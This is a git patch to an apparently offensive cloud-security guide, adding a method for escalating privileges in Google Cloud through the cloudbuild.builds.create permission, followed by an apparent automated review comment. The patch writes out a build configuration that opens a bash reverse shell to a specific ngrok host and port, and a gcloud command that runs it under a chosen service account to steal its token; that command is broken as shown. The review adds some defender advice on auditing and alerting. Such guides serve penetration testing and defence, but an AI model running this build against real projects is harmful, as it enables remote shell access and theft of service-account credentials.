From 65da889db0f59f4f1174443c59d448c9685f7ba8 Mon Sep 17 00:00:00 2001 From: hasshido Date: Wed, 30 Jul 2025 21:00:52 +0200 Subject: [PATCH] Update cloudbuild.builds.create exploitation method Includes direct gcloud command description to exploit this permission. --- .../gcp-cloudbuild-privesc.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md index c7fe2f0be..5557616d1 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md 
@@ -15,6 +15,24 @@ For more information about Cloud Build check: With this permission you can **submit a cloud build**. The cloudbuild machine will have in it’s filesystem by **default a token of the cloudbuild Service Account**: `@cloudbuild.gserviceaccount.com`. However, you can **indicate any service account inside the project** in the cloudbuild configuration.\ Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change). +#### Direct exploitation via gcloud CLI + +1- Create `cloudbuild.yaml` and modify with your listener data +```yaml +steps: + - name: bash + script: | + #!/usr/bin/env bash + bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1 +options: + logging: CLOUD_LOGGING_ONLY +``` +2- Upload a simple build with no source, the yaml file and specify the SA to use on the build: +```bash +gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects//serviceAccounts/@.iam.gserviceaccount.com +``` + +#### Using python gcloud library You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). 
Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.** For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)
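Review bot: the `gcloud builds submit` command in step 2 is broken as written: the `--service-account="projects//serviceAccounts/@.iam.gserviceaccount.com` argument opens a double quote that is never closed, and the project and service-account names have been stripped from the resource path, leaving `projects//` and `@.iam`; write it with clearly marked placeholders, e.g. `--service-account="projects/<PROJECT_ID>/serviceAccounts/<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"`, so a reader can see what to substitute. The same applies to the YAML in step 1: `bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1` hard-codes one specific ngrok endpoint, which contradicts the "modify with your listener data" instruction and should be `<LISTENER_HOST>/<LISTENER_PORT>`. Two documentation gaps: `options: logging: CLOUD_LOGGING_ONLY` is added without explanation, and it is not optional here, since a build that names a non-default service account is rejected unless the logging option is set explicitly, so the text should say that; and the unchanged context line claims you can "indicate any service account inside the project", but the caller must also hold `iam.serviceAccounts.actAs` on that account, which is the binding a defender should audit together with `cloudbuild.builds.create` (and the reason build submissions with a non-default `serviceAccount` are worth alerting on in Cloud Audit Logs). Minor: the `1-` and `2-` step markers do not render as a Markdown ordered list; use `1.` and `2.`.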